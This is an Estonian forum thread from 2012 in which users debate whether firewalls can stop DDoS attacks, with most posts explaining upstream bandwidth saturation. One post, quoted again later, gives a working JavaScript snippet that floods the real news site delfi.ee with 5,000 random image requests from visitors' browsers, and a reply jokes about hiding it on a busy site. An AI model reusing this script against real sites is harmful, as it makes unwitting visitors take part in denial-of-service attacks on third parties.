|
Hinnavaatlus
:: Foorum
:: Uudised
:: Ärifoorumid
:: HV F1 ennustusvõistlus
:: Pangalink
:: Telekavad
:: HV toote otsing
|
|
| autor |
|
part24
HV kasutaja
liitunud: 03.10.2008
|
13.10.2012 17:05:24
|
|
|
viimati muutis part24 19.09.2013 15:58:55, muudetud 1 kord |
|
| Kommentaarid: 37 loe/lisa |
Kasutajad arvavad: |
   |
:: |
0 :: |
0 :: |
35 |
|
| tagasi üles |
|
 |
vaegkuulja
Aeg maha 30
liitunud: 08.11.2007
|
|
13.10.2012 17:11:18
|
|
|
| part24 kirjutas: |
| Ausamaste üteldes, jätab mind üsna külmaks, mis neil on või mis neil ei ole. Seda, mis neil on, seda koolipoisid koomasse ei lase, samuti nagu rotid ei lase aurulaeva põhja, närigu kui palju jõuavad! Kihla vedada võin ma ainult selle peale, et see mass, millisele määri pähe ükskõik mida ükskõik millises soustis, see usub igasugust peaaegu tingimusteta. |
Reaalne praktika näitab aga et lastakse põhja serverid ja sedalaadi uudiseid on meedias pidevalt. Ning enamatel juhtudel ongi need põhjalaskjad koolipoisikesed. Järeldused võib ise teha. Tunnustatud võrguturva tooteid kasutades ei peaks adminnid isegi tähelepanu pöörama rünnetele, ammugi veel meedias kajastamisele ja serveri rivist välja löömisele.
_________________
[img:]https://foorum.hinnavaatlus.ee/images/200x40_HV.gif[/img:] |
|
| Kommentaarid: 4 loe/lisa |
Kasutajad arvavad: |
|
:: |
2 :: |
0 :: |
1 |
|
| tagasi üles |
|
|
ufo56
HV Guru
liitunud: 18.11.2004
|
|
13.10.2012 17:18:06
|
|
|
VPN teenusepakkuja peab olema selline kes hindab privaatsust ja selliseid on. nolog vpn'id.
_________________
 Lae pildid -> pilt.io |
|
| Kommentaarid: 79 loe/lisa |
Kasutajad arvavad: |
|
:: |
0 :: |
0 :: |
67 |
|
| tagasi üles |
|
|
vaegkuulja
Aeg maha 30
liitunud: 08.11.2007
|
|
13.10.2012 17:22:39
|
|
|
| ufo56 kirjutas: |
| VPN teenusepakkuja peab olema selline kes hindab privaatsust ja selliseid on. nolog vpn'id. |
Ja interpoli kaudu VPN teenusepakkuja läbiotsimise taotlemine Eesti riigi poolt pole kohe kindlasti maksumaksjale odav. Odav on aga ettevõttele kisa tõsta ja oma pasku tulemüüre ja odavat tööjõudu sigitada.
_________________
[img:]https://foorum.hinnavaatlus.ee/images/200x40_HV.gif[/img:] |
|
| Kommentaarid: 4 loe/lisa |
Kasutajad arvavad: |
|
:: |
2 :: |
0 :: |
1 |
|
| tagasi üles |
|
|
tahanteada
Lõuapoolik
liitunud: 04.04.2003
|
|
13.10.2012 18:01:20
|
|
|
| vaegkuulja kirjutas: |
| ufo56 kirjutas: |
| VPN teenusepakkuja peab olema selline kes hindab privaatsust ja selliseid on. nolog vpn'id. |
Ja interpoli kaudu VPN teenusepakkuja läbiotsimise taotlemine Eesti riigi poolt pole kohe kindlasti maksumaksjale odav. Odav on aga ettevõttele kisa tõsta ja oma pasku tulemüüre ja odavat tööjõudu sigitada. |
No see Interpol ei huvita , näiteks, FSB-d ega NSA-d, kopika eestki mitte.  Lisaks veel see, et USA ISP-delt nõutakse nii liikluste analüüse kui ka nende salvestamisi ja mitte kedagi ei huvita ISP-de soigumine, et jälitus ning salvestus on väga kallis ettevõtmine. Käsk on jälgida ja salvestada ning see kuulub täitmisele. Kui liialt palju vastu kobisetakse, siis pannakse ISP võrk kinni ja kogu lugu.
PS: Ka Eestis on liikunud ringi idee, et ISP-d peavad jälitamist ning salvestamist tegema ning mille peale ISP-d samamoodi kisa tõstsid, et väga kallis on ja et raha pole seadmete ostmiseks.
|
|
| Kommentaarid: 284 loe/lisa |
Kasutajad arvavad: |
|
:: |
2 :: |
11 :: |
211 |
|
| tagasi üles |
|
|
vaegkuulja
Aeg maha 30
liitunud: 08.11.2007
|
|
13.10.2012 19:35:30
|
|
|
| tahanteada kirjutas: |
| vaegkuulja kirjutas: |
| ufo56 kirjutas: |
| VPN teenusepakkuja peab olema selline kes hindab privaatsust ja selliseid on. nolog vpn'id. |
Ja interpoli kaudu VPN teenusepakkuja läbiotsimise taotlemine Eesti riigi poolt pole kohe kindlasti maksumaksjale odav. Odav on aga ettevõttele kisa tõsta ja oma pasku tulemüüre ja odavat tööjõudu sigitada. |
No see Interpol ei huvita , näiteks, FSB-d ega NSA-d, kopika eestki mitte. Lisaks veel see, et USA ISP-delt nõutakse nii liikluste analüüse kui ka nende salvestamisi ja mitte kedagi ei huvita ISP-de soigumine, et jälitus ning salvestus on väga kallis ettevõtmine. Käsk on jälgida ja salvestada ning see kuulub täitmisele. Kui liialt palju vastu kobisetakse, siis pannakse ISP võrk kinni ja kogu lugu.
PS: Ka Eestis on liikunud ringi idee, et ISP-d peavad jälitamist ning salvestamist tegema ning mille peale ISP-d samamoodi kisa tõstsid, et väga kallis on ja et raha pole seadmete ostmiseks. |
Interpoli see ei peagi huvitama aga raha tuleb maksumaksja taskust. Maksumaksjat huvitab selline raha tuulde loopimine küll. ISP'de kinni panemine ei maksa ka midagi. ISP'de kulutused ei tulegi maksumaksja taskust, see on erafirma. Politsei pole erafirma ja nende kulutused tulevad maksumaksja taskust.
_________________
[img:]https://foorum.hinnavaatlus.ee/images/200x40_HV.gif[/img:] |
|
| Kommentaarid: 4 loe/lisa |
Kasutajad arvavad: |
|
:: |
2 :: |
0 :: |
1 |
|
| tagasi üles |
|
|
Bssldr
HV kasutaja
liitunud: 05.12.2009
|
|
13.10.2012 22:07:21
|
|
|
| vaegkuulja kirjutas: |
| part24 kirjutas: |
| Ausamaste üteldes, jätab mind üsna külmaks, mis neil on või mis neil ei ole. Seda, mis neil on, seda koolipoisid koomasse ei lase, samuti nagu rotid ei lase aurulaeva põhja, närigu kui palju jõuavad! Kihla vedada võin ma ainult selle peale, et see mass, millisele määri pähe ükskõik mida ükskõik millises soustis, see usub igasugust peaaegu tingimusteta. |
Reaalne praktika näitab aga et lastakse põhja serverid ja sedalaadi uudiseid on meedias pidevalt. Ning enamatel juhtudel ongi need põhjalaskjad koolipoisikesed. Järeldused võib ise teha. Tunnustatud võrguturva tooteid kasutades ei peaks adminnid isegi tähelepanu pöörama rünnetele, ammugi veel meedias kajastamisele ja serveri rivist välja löömisele. |
Ole hea ja seleta lähemalt, kuidas see tunnustatud võrguturva toode nii ulmeliselt hästi nüüd serverit rivist välja löömise eest kaitsma peaks. See, mis siin eesti serverite vastu korraldati, oli hale üritus - arvatavasti istus kümmekond teismelist IRCus ja koordineeriti omavahel "lükkame nüüd oma DoS utiliidid käima" ning arvatavasti tehti rünnak oma koduste ühenduste pealt. Tänapäeval pole 100K - 1M botnet mingi haruldus ja kui sellisega lajatatakse, siis nalja pole. Muidugi, nii suurte botnettide omanikud eelistavad raha teenida, mitte ei tegele vabadusvõitlusega.
|
|
| Kommentaarid: 9 loe/lisa |
Kasutajad arvavad: |
|
:: |
0 :: |
0 :: |
8 |
|
| tagasi üles |
|
|
vaegkuulja
Aeg maha 30
liitunud: 08.11.2007
|
|
13.10.2012 22:29:47
|
|
|
| Bssldr kirjutas: |
Ole hea ja seleta lähemalt, kuidas see tunnustatud võrguturva toode nii ulmeliselt hästi nüüd serverit rivist välja löömise eest kaitsma peaks.
|
Ma arvan et selle jaoks tuleb tootekoolitus tellida ning lõpuks saad paberi et koolitus on läbitud.
_________________
[img:]https://foorum.hinnavaatlus.ee/images/200x40_HV.gif[/img:] |
|
| Kommentaarid: 4 loe/lisa |
Kasutajad arvavad: |
|
:: |
2 :: |
0 :: |
1 |
|
| tagasi üles |
|
|
Bssldr
HV kasutaja
liitunud: 05.12.2009
|
|
13.10.2012 22:58:24
|
|
|
| vaegkuulja kirjutas: |
| Bssldr kirjutas: |
Ole hea ja seleta lähemalt, kuidas see tunnustatud võrguturva toode nii ulmeliselt hästi nüüd serverit rivist välja löömise eest kaitsma peaks.
|
Ma arvan et selle jaoks tuleb tootekoolitus tellida ning lõpuks saad paberi et koolitus on läbitud. |
Väike vihje sulle: Tulemüür on uks, kust saavad sisse head 'isikud'. Aga kui tee ukseni on umbes, siis on ka serveri poolt pakutud teenus häiritud.
|
|
| Kommentaarid: 9 loe/lisa |
Kasutajad arvavad: |
|
:: |
0 :: |
0 :: |
8 |
|
| tagasi üles |
|
|
vaegkuulja
Aeg maha 30
liitunud: 08.11.2007
|
|
14.10.2012 00:44:35
|
|
|
| Bssldr kirjutas: |
| vaegkuulja kirjutas: |
| Bssldr kirjutas: |
Ole hea ja seleta lähemalt, kuidas see tunnustatud võrguturva toode nii ulmeliselt hästi nüüd serverit rivist välja löömise eest kaitsma peaks.
|
Ma arvan et selle jaoks tuleb tootekoolitus tellida ning lõpuks saad paberi et koolitus on läbitud. |
Väike vihje sulle: Tulemüür on uks, kust saavad sisse head 'isikud'. Aga kui tee ukseni on umbes, siis on ka serveri poolt pakutud teenus häiritud. |
Kõlab küll filosoofiliselt aga pole usutav.
_________________
[img:]https://foorum.hinnavaatlus.ee/images/200x40_HV.gif[/img:] |
|
| Kommentaarid: 4 loe/lisa |
Kasutajad arvavad: |
|
:: |
2 :: |
0 :: |
1 |
|
| tagasi üles |
|
|
Bssldr
HV kasutaja
liitunud: 05.12.2009
|
|
14.10.2012 01:59:13
|
|
|
| vaegkuulja kirjutas: |
| Bssldr kirjutas: |
| vaegkuulja kirjutas: |
| Bssldr kirjutas: |
Ole hea ja seleta lähemalt, kuidas see tunnustatud võrguturva toode nii ulmeliselt hästi nüüd serverit rivist välja löömise eest kaitsma peaks.
|
Ma arvan et selle jaoks tuleb tootekoolitus tellida ning lõpuks saad paberi et koolitus on läbitud. |
Väike vihje sulle: Tulemüür on uks, kust saavad sisse head 'isikud'. Aga kui tee ukseni on umbes, siis on ka serveri poolt pakutud teenus häiritud. |
Kõlab küll filosoofiliselt aga pole usutav. |
Aga ole siis loll edasi, sobib kohe sulle.
|
|
| Kommentaarid: 9 loe/lisa |
Kasutajad arvavad: |
|
:: |
0 :: |
0 :: |
8 |
|
| tagasi üles |
|
|
Some
HV vaatleja
liitunud: 07.11.2001
|
|
14.10.2012 09:36:36
|
|
|
| vaegkuulja kirjutas: |
| Bssldr kirjutas: |
| vaegkuulja kirjutas: |
| Bssldr kirjutas: |
Ole hea ja seleta lähemalt, kuidas see tunnustatud võrguturva toode nii ulmeliselt hästi nüüd serverit rivist välja löömise eest kaitsma peaks.
|
Ma arvan et selle jaoks tuleb tootekoolitus tellida ning lõpuks saad paberi et koolitus on läbitud. |
Väike vihje sulle: Tulemüür on uks, kust saavad sisse head 'isikud'. Aga kui tee ukseni on umbes, siis on ka serveri poolt pakutud teenus häiritud. |
Kõlab küll filosoofiliselt aga pole usutav. |
Jätame siis filosoofia kõrvale. Ütleme, et su server istub 1Gbit/s kanali otsas, rünnatakse botnetiga mis suudab tekitada 20Gbit/s liiklust. Mis valemiga suudaks ka kõige intelligentsem tulemüür ummistust vältida, ta on ju vales toru otsas?
|
|
| Kommentaarid: 12 loe/lisa |
Kasutajad arvavad: |
|
:: |
0 :: |
1 :: |
9 |
|
| tagasi üles |
|
|
LKits
HV Guru
liitunud: 06.09.2007
|
|
| Kommentaarid: 13 loe/lisa |
Kasutajad arvavad: |
|
:: |
0 :: |
0 :: |
13 |
|
| tagasi üles |
|
|
vaegkuulja
Aeg maha 30
liitunud: 08.11.2007
|
|
14.10.2012 09:42:58
|
|
|
| Bssldr kirjutas: |
Aga ole siis loll edasi, sobib kohe sulle. |
Minu arust lolliks on ju jäänud nagu rohkem need kes oma servereid kaitsevad ja kellele lapsed ära teevad.
| Some kirjutas: |
Jätame siis filosoofia kõrvale. Ütleme, et su server istub 1Gbit/s kanali otsas, rünnatakse botnetiga mis suudab tekitada 20Gbit/s liiklust. Mis valemiga suudaks ka kõige intelligentsem tulemüür ummistust vältida, ta on ju vales toru otsas? |
Tulemüür blokib koheselt ründaja IP, mingit liiklust ei tekigi ja serveriten asi ei jõuagi.
_________________
[img:]https://foorum.hinnavaatlus.ee/images/200x40_HV.gif[/img:] |
|
| Kommentaarid: 4 loe/lisa |
Kasutajad arvavad: |
|
:: |
2 :: |
0 :: |
1 |
|
| tagasi üles |
|
|
LKits
HV Guru
liitunud: 06.09.2007
|
|
| Kommentaarid: 13 loe/lisa |
Kasutajad arvavad: |
|
:: |
0 :: |
0 :: |
13 |
|
| tagasi üles |
|
|
vaegkuulja
Aeg maha 30
liitunud: 08.11.2007
|
|
14.10.2012 09:49:12
|
|
|
| LKits kirjutas: |
| Aga, kui suudetakse tekitada taoline liiklus, mis ajab ruuteri nii kooma, et ta ei saa filtreerimisegagi hakkama? |
Just sellepärast ongi tarvis muretseda CheckPointi võimsad tulemüürid mida ei saa kooma ajada.
_________________
[img:]https://foorum.hinnavaatlus.ee/images/200x40_HV.gif[/img:] |
|
| Kommentaarid: 4 loe/lisa |
Kasutajad arvavad: |
|
:: |
2 :: |
0 :: |
1 |
|
| tagasi üles |
|
|
LKits
HV Guru
liitunud: 06.09.2007
|
|
| Kommentaarid: 13 loe/lisa |
Kasutajad arvavad: |
|
:: |
0 :: |
0 :: |
13 |
|
| tagasi üles |
|
|
mikk36
HV Guru
liitunud: 21.02.2004
|
|
14.10.2012 10:02:12
|
|
|
vaegkuulja, tulemüürist pole endiselt kasu, kui nende esmaste päringute (mida tulemüür siis blokeerib) maht juba ületab toru piiri. DDoS'i eesmärk ei olegi mingit data't kohale viia, vaid üksikuid pakette saata meeletus koguses, mida igaüht pead eraldi blokeerima ja ei saa suurele portsule korraga "EI" öelda.
Et sellisest asjast jagu saada, on sul vaja blokeerida palju kaugemalt, ISP'de tasemel, mis pakette sinu suunas suunavad.
|
|
| Kommentaarid: 85 loe/lisa |
Kasutajad arvavad: |
|
:: |
0 :: |
2 :: |
78 |
|
| tagasi üles |
|
|
Etz
HV Guru
liitunud: 27.01.2005
|
|
14.10.2012 10:09:06
|
|
|
vaegkuulja, CheckPoint läheb kummuli nii nagu iga teinegi seade... 
_________________
...life is random...so am I...
So, there is a fan. Time to grab your sh*t, gentlemen!
|
|
| Kommentaarid: 236 loe/lisa |
Kasutajad arvavad: |
|
:: |
0 :: |
0 :: |
196 |
|
| tagasi üles |
|
|
Some
HV vaatleja
liitunud: 07.11.2001
|
|
14.10.2012 10:10:17
|
|
|
| vaegkuulja kirjutas: |
| Bssldr kirjutas: |
Aga ole siis loll edasi, sobib kohe sulle. |
Minu arust lolliks on ju jäänud nagu rohkem need kes oma servereid kaitsevad ja kellele lapsed ära teevad.
| Some kirjutas: |
Jätame siis filosoofia kõrvale. Ütleme, et su server istub 1Gbit/s kanali otsas, rünnatakse botnetiga mis suudab tekitada 20Gbit/s liiklust. Mis valemiga suudaks ka kõige intelligentsem tulemüür ummistust vältida, ta on ju vales toru otsas? |
Tulemüür blokib koheselt ründaja IP, mingit liiklust ei tekigi ja serveriten asi ei jõuagi. |
Su tulemüür on vales toru otsas. St ummistus tekib juba enne sinu hüperpupertulemüüri. Ainus mida sa kliendina teha saad on palvetada magistraalvõrkude haldajate peale, et nad avastaksid ebaloomuliku trafficu sinu suunas ja suudavad selle kontrolli alla võtta.
|
|
| Kommentaarid: 12 loe/lisa |
Kasutajad arvavad: |
|
:: |
0 :: |
1 :: |
9 |
|
| tagasi üles |
|
|
vaegkuulja
Aeg maha 30
liitunud: 08.11.2007
|
|
14.10.2012 10:31:22
|
|
|
| mikk36 kirjutas: |
vaegkuulja, tulemüürist pole endiselt kasu, kui nende esmaste päringute (mida tulemüür siis blokeerib) maht juba ületab toru piiri. DDoS'i eesmärk ei olegi mingit data't kohale viia, vaid üksikuid pakette saata meeletus koguses, mida igaüht pead eraldi blokeerima ja ei saa suurele portsule korraga "EI" öelda.
Et sellisest asjast jagu saada, on sul vaja blokeerida palju kaugemalt, ISP'de tasemel, mis pakette sinu suunas suunavad. |
See toru ei koti üldse - CheckPoint oskab kasutada mitut "toru" korraga (ISP'd) ka siseneva liikluse tarbeks ja dünaamiliselt reguleerida liiklust nende vahel. Korralikult planeeritud võrgu puhul peabki olema kasutusel mitme ISP ühendused.
_________________
[img:]https://foorum.hinnavaatlus.ee/images/200x40_HV.gif[/img:] |
|
| Kommentaarid: 4 loe/lisa |
Kasutajad arvavad: |
|
:: |
2 :: |
0 :: |
1 |
|
| tagasi üles |
|
|
Etz
HV Guru
liitunud: 27.01.2005
|
|
14.10.2012 11:13:33
|
|
|
| vaegkuulja kirjutas: |
| See toru ei koti üldse - CheckPoint oskab kasutada mitut "toru" korraga (ISP'd) ka siseneva liikluse tarbeks ja dünaamiliselt reguleerida liiklust nende vahel. Korralikult planeeritud võrgu puhul peabki olema kasutusel mitme ISP ühendused. |
Jajahh, oleme ennegi näinud sellist redundancyt, kus mitu sisenevat ISP toru, aga tulemüür on üks, mis siis pidulikult kummuli läheb ja kogu ühenduse endaga ikkagi kaasa viib... 
|
|
| Kommentaarid: 236 loe/lisa |
Kasutajad arvavad: |
|
:: |
0 :: |
0 :: |
196 |
|
| tagasi üles |
|
|
vaegkuulja
Aeg maha 30
liitunud: 08.11.2007
|
|
14.10.2012 11:22:08
|
|
|
| Etz kirjutas: |
Jajahh, oleme ennegi näinud sellist redundancyt, kus mitu sisenevat ISP toru, aga tulemüür on üks, mis siis pidulikult kummuli läheb ja kogu ühenduse endaga ikkagi kaasa viib... |
Sellepärast tulebki kasutada korralikke tulemüüre.
| LKits kirjutas: |
| Ja siis leitakse mingi turvaauk, mille korral saab ruuteri väga lihtsa paketi abil kooma ajada... |
CheckPointil on sadu teada turvaauke ja kaitseid nende vastu. Serverite turvaaukude jaoks on selleks spetsiaalsed policid. Kui peaksid leidma mingi turvaaugu millest CheckPoint arendajad veel teadlikud pole, siis võtad nendega ühendust ning peaks olema loota selle avastuse eest ka meeldiv preemia. Aga ma ei usu hästi sellist muinasjuttu, kõigepealt võiks alustada laste rünnakute tõrjumisest.
_________________
[img:]https://foorum.hinnavaatlus.ee/images/200x40_HV.gif[/img:] |
|
| Kommentaarid: 4 loe/lisa |
Kasutajad arvavad: |
|
:: |
2 :: |
0 :: |
1 |
|
| tagasi üles |
|
|
Some
HV vaatleja
liitunud: 07.11.2001
|
|
14.10.2012 11:23:14
|
|
|
| vaegkuulja kirjutas: |
| mikk36 kirjutas: |
vaegkuulja, tulemüürist pole endiselt kasu, kui nende esmaste päringute (mida tulemüür siis blokeerib) maht juba ületab toru piiri. DDoS'i eesmärk ei olegi mingit data't kohale viia, vaid üksikuid pakette saata meeletus koguses, mida igaüht pead eraldi blokeerima ja ei saa suurele portsule korraga "EI" öelda.
Et sellisest asjast jagu saada, on sul vaja blokeerida palju kaugemalt, ISP'de tasemel, mis pakette sinu suunas suunavad. |
See toru ei koti üldse - CheckPoint oskab kasutada mitut "toru" korraga (ISP'd) ka siseneva liikluse tarbeks ja dünaamiliselt reguleerida liiklust nende vahel. Korralikult planeeritud võrgu puhul peabki olema kasutusel mitme ISP ühendused. |
Miks sa arvad et see aitab? Ega sind ISP ründa, kui sa kasutad mitut toru, siis tuleb ka rünnak mitmest torust.
|
|
| Kommentaarid: 12 loe/lisa |
Kasutajad arvavad: |
|
:: |
0 :: |
1 :: |
9 |
|
| tagasi üles |
|
|
vaegkuulja
Aeg maha 30
liitunud: 08.11.2007
|
|
14.10.2012 11:27:09
|
|
|
| Some kirjutas: |
Miks sa arvad et see aitab? Ega sind ISP ründa, kui sa kasutad mitut toru, siis tuleb ka rünnak mitmest torust. |
Ja ongi kõigil torudel kaitse. Kui arvasid äkki et ainult ühel torul on kaitse. Et siis lapsed vallutavad kõik Eesti ISP'd ja koormavad botidega üle kogu eestisisese liikluse? Filme võiks vähem vaadata ja liigutada reaalse kaitse tõhustamiseks.
_________________
[img:]https://foorum.hinnavaatlus.ee/images/200x40_HV.gif[/img:] |
|
| Kommentaarid: 4 loe/lisa |
Kasutajad arvavad: |
|
:: |
2 :: |
0 :: |
1 |
|
| tagasi üles |
|
|
Tanel
HV Guru
liitunud: 01.10.2001
|
|
| Kommentaarid: 463 loe/lisa |
Kasutajad arvavad: |
|
:: |
5 :: |
7 :: |
360 |
|
| tagasi üles |
|
|
LKits
HV Guru
liitunud: 06.09.2007
|
|
| Kommentaarid: 13 loe/lisa |
Kasutajad arvavad: |
|
:: |
0 :: |
0 :: |
13 |
|
| tagasi üles |
|
|
vaegkuulja
Aeg maha 30
liitunud: 08.11.2007
|
|
14.10.2012 11:34:43
|
|
|
| LKits kirjutas: |
Võib tulla see üllatusena, aga tavalise lehitsejaga saab samuti DDoS rünnakut kodulehe vastu teha ning see rünnak võib olla peidetud tavakasutaja lehitsejasse.
Näide: Kasutaja läheb lehele X, kust antakse talle Javascript koodi läbi käsk koormata teist serverit. Kasutaja ei pruugi sellest vägagi aru saada ainult, et nett on aeglane. |
Just sellepärast tulebki alustada tulemüüridest milledel on ka layer 6 ja 7 kaitsed, ehk siis nad oskavad lugeda kõrgemaid protokolle ja on suutelised analüüsima ja blokeerima ründe iseloomuga liiklust kuni IP blokeerimiseni.
_________________
[img:]https://foorum.hinnavaatlus.ee/images/200x40_HV.gif[/img:] |
|
| Kommentaarid: 4 loe/lisa |
Kasutajad arvavad: |
|
:: |
2 :: |
0 :: |
1 |
|
| tagasi üles |
|
|
Some
HV vaatleja
liitunud: 07.11.2001
|
|
14.10.2012 11:39:46
|
|
|
| vaegkuulja kirjutas: |
| Some kirjutas: |
Miks sa arvad et see aitab? Ega sind ISP ründa, kui sa kasutad mitut toru, siis tuleb ka rünnak mitmest torust. |
Ja ongi kõigil torudel kaitse. Kui arvasid äkki et ainult ühel torul on kaitse. Et siis lapsed vallutavad kõik Eesti ISP'd ja koormavad botidega üle kogu eestisisese liikluse? Filme võiks vähem vaadata ja liigutada reaalse kaitse tõhustamiseks. |
Aaaaarghhh!!!! Miks peavad lapsed mingeid ISP-e vallutama? Sul kükitab kuskil mingi teenus millele peab olema avalik ligipääs. Rünnak tuleb samu kanaleid mööda mida kasutavad sinu tavalised kliendid. Ründajat absoluutselt ei huvita kes su ISP on ja kuidas liiklus sinu juurde ruuditud, mitu toru sul on jne... Kui su teenus on avalikkusele avatud, siis on see avatud ka ründajale. Sinu Checkpoint saab alles siis midagi teha kui ründaja poolt tekitatud traffic on väiksem kui sinu torude läbilase. Kujuta ette kui 10 tuhat pensionäri ühekorraga üritaksid läbi Toompea väravate pressida, tekiks ju pisike tropp? Kallid HV-lased, aidake talle seletada, minu seletusoskusest jääb hetkel väheks...
|
|
| Kommentaarid: 12 loe/lisa |
Kasutajad arvavad: |
|
:: |
0 :: |
1 :: |
9 |
|
| tagasi üles |
|
|
vaegkuulja
Aeg maha 30
liitunud: 08.11.2007
|
|
14.10.2012 11:49:55
|
|
|
| Some kirjutas: |
Aaaaarghhh!!!! Miks peavad lapsed mingeid ISP-e vallutama? Sul kükitab kuskil mingi teenus millele peab olema avalik ligipääs. Rünnak tuleb samu kanaleid mööda mida kasutavad sinu tavalised kliendid. Ründajat absoluutselt ei huvita kes su ISP on ja kuidas liiklus sinu juurde ruuditud, mitu toru sul on jne... Kui su teenus on avalikkusele avatud, siis on see avatud ka ründajale. Sinu Checkpoint saab alles siis midagi teha kui ründaja poolt tekitatud traffic on väiksem kui sinu torude läbilase. Kujuta ette kui 10 tuhat pensionäri ühekorraga üritaksid läbi Toompea väravate pressida, tekiks ju pisike tropp? Kallid HV-lased, aidake talle seletada, minu seletusoskusest jääb hetkel väheks... |
Selleks et toru ummistada peab olema ka mingi liiklus, ehk paketid peaksid saama vastuse, mida aga tulemüür ei anna. Pealegi ma ei usu et lapsed ühtegi toru ummistada suudaks ainult ühepoolsete pakettidega, juhul kui pole dial-up ühendus.
_________________
[img:]https://foorum.hinnavaatlus.ee/images/200x40_HV.gif[/img:] |
|
| Kommentaarid: 4 loe/lisa |
Kasutajad arvavad: |
|
:: |
2 :: |
0 :: |
1 |
|
| tagasi üles |
|
|
LKits
HV Guru
liitunud: 06.09.2007
|
|
14.10.2012 11:51:02
|
|
|
| vaegkuulja kirjutas: |
| LKits kirjutas: |
Võib tulla see üllatusena, aga tavalise lehitsejaga saab samuti DDoS rünnakut kodulehe vastu teha ning see rünnak võib olla peidetud tavakasutaja lehitsejasse.
Näide: Kasutaja läheb lehele X, kust antakse talle Javascript koodi läbi käsk koormata teist serverit. Kasutaja ei pruugi sellest vägagi aru saada ainult, et nett on aeglane. |
Just sellepärast tulebki alustada tulemüüridest milledel on ka layer 6 ja 7 kaitsed, ehk siis nad oskavad lugeda kõrgemaid protokolle ja on suutelised analüüsima ja blokeerima ründe iseloomuga liiklust kuni IP blokeerimiseni. |
Isegi, kui "ründe" iseloom on täiesti tavaline lehekülje koormamine täiesti tavaliste päringutega? Ehk siis tulemüür võtab ise lehekülje maha, sest too on ju rünnaku all ja rünnaku enda eesmärk on lehekülg maha saada.
Mission accomplished?
Ülimalt lihtne script, mis jooksutab nii mõnegi kasutaja neti kooma ja, kui scripti jooksutajaid on sadu või tuhandeid, siis palju õnne leheküljele - väga karm koormus tuleb taha:
<script type="text/javascript">
for(i=1;i<=5000;i++)
{ document.write('<img src="http://www.delfi.ee/index.php?' + Math.random() + '" width=1 height=1 border=0>');}
</script> |
Koodi eesmärk on kuvada 5000 pilti resolutsiooniga 1x1, mille sisu on Delfi pealeht. Pilti ennast ei eksisteeri, sest pilti sisu on värdjalik, aga Delfi server satub VÄGA ränga koormuse alla.
_________________
 itLahendused - Arvutite remont ja hooldus, veebilehtede loomine, soodne veebimajutus. Võta ühendust! Tel: +372 555 268 97 ja e-post info@itlahendused.ee |
|
| Kommentaarid: 13 loe/lisa |
Kasutajad arvavad: |
|
:: |
0 :: |
0 :: |
13 |
|
| tagasi üles |
|
|
Some
HV vaatleja
liitunud: 07.11.2001
|
|
14.10.2012 11:53:32
|
|
|
| vaegkuulja kirjutas: |
| Some kirjutas: |
Aaaaarghhh!!!! Miks peavad lapsed mingeid ISP-e vallutama? Sul kükitab kuskil mingi teenus millele peab olema avalik ligipääs. Rünnak tuleb samu kanaleid mööda mida kasutavad sinu tavalised kliendid. Ründajat absoluutselt ei huvita kes su ISP on ja kuidas liiklus sinu juurde ruuditud, mitu toru sul on jne... Kui su teenus on avalikkusele avatud, siis on see avatud ka ründajale. Sinu Checkpoint saab alles siis midagi teha kui ründaja poolt tekitatud traffic on väiksem kui sinu torude läbilase. Kujuta ette kui 10 tuhat pensionäri ühekorraga üritaksid läbi Toompea väravate pressida, tekiks ju pisike tropp? Kallid HV-lased, aidake talle seletada, minu seletusoskusest jääb hetkel väheks... |
Selleks et toru ummistada peab olema ka mingi liiklus, ehk paketid peaksid saama vastuse, mida aga tulemüür ei anna. Pealegi ma ei usu et lapsed ühtegi toru ummistada suudaks ainult ühepoolsete pakettidega, juhul kui pole dial-up ühendus. |
Tõstan käed. Uudishimust küsin kas töötad müügimehena või võrguadminnina?
|
|
| Kommentaarid: 12 loe/lisa |
Kasutajad arvavad: |
|
:: |
0 :: |
1 :: |
9 |
|
| tagasi üles |
|
|
vaegkuulja
Aeg maha 30
liitunud: 08.11.2007
|
|
14.10.2012 11:53:55
|
|
|
| LKits kirjutas: |
Ehk siis tulemüür võtab ise lehekülje maha, sest too on ju rünnaku all ja rünnaku enda eesmärk on lehekülg maha saada.
Mission accomplished?
|
Miks peaks tulemüür lehekülge maha võtma? Ei, ta võtab maha ainult sinu IP.
_________________
[img:]https://foorum.hinnavaatlus.ee/images/200x40_HV.gif[/img:] |
|
| Kommentaarid: 4 loe/lisa |
Kasutajad arvavad: |
|
:: |
2 :: |
0 :: |
1 |
|
| tagasi üles |
|
|
Some
HV vaatleja
liitunud: 07.11.2001
|
|
14.10.2012 11:55:42
|
|
|
| LKits kirjutas: |
| vaegkuulja kirjutas: |
| LKits kirjutas: |
Võib tulla see üllatusena, aga tavalise lehitsejaga saab samuti DDoS rünnakut kodulehe vastu teha ning see rünnak võib olla peidetud tavakasutaja lehitsejasse.
Näide: Kasutaja läheb lehele X, kust antakse talle Javascript koodi läbi käsk koormata teist serverit. Kasutaja ei pruugi sellest vägagi aru saada ainult, et nett on aeglane. |
Just sellepärast tulebki alustada tulemüüridest milledel on ka layer 6 ja 7 kaitsed, ehk siis nad oskavad lugeda kõrgemaid protokolle ja on suutelised analüüsima ja blokeerima ründe iseloomuga liiklust kuni IP blokeerimiseni. |
Isegi, kui "ründe" iseloom on täiesti tavaline lehekülje koormamine täiesti tavaliste päringutega? Ehk siis tulemüür võtab ise lehekülje maha, sest too on ju rünnaku all ja rünnaku enda eesmärk on lehekülg maha saada.
Mission accomplished?
Ülimalt lihtne script, mis jooksutab nii mõnegi kasutaja neti kooma ja, kui scripti jooksutajaid on sadu või tuhandeid, siis palju õnne leheküljele - väga karm koormus tuleb taha:
<script type="text/javascript">
for(i=1;i<=5000;i++)
{ document.write('<img src="http://www.delfi.ee/index.php?' + Math.random() + '" width=1 height=1 border=0>');}
</script> |
Koodi eesmärk on kuvada 5000 pilti resolutsiooniga 1x1, mille sisu on Delfi pealeht. Pilti ennast ei eksisteeri, sest pilti sisu on värdjalik, aga Delfi server satub VÄGA ränga koormuse alla. |
Paneks selle mõne popima pornolehe sortsu? 
|
|
| Kommentaarid: 12 loe/lisa |
Kasutajad arvavad: |
|
:: |
0 :: |
1 :: |
9 |
|
| tagasi üles |
|
|
Tanel
HV Guru
liitunud: 01.10.2001
|
|
| Kommentaarid: 463 loe/lisa |
Kasutajad arvavad: |
|
:: |
5 :: |
7 :: |
360 |
|
| tagasi üles |
|
|
LKits
HV Guru
liitunud: 06.09.2007
|
|
| Kommentaarid: 13 loe/lisa |
Kasutajad arvavad: |
|
:: |
0 :: |
0 :: |
13 |
|
| tagasi üles |
|
|
vaegkuulja
Aeg maha 30
liitunud: 08.11.2007
|
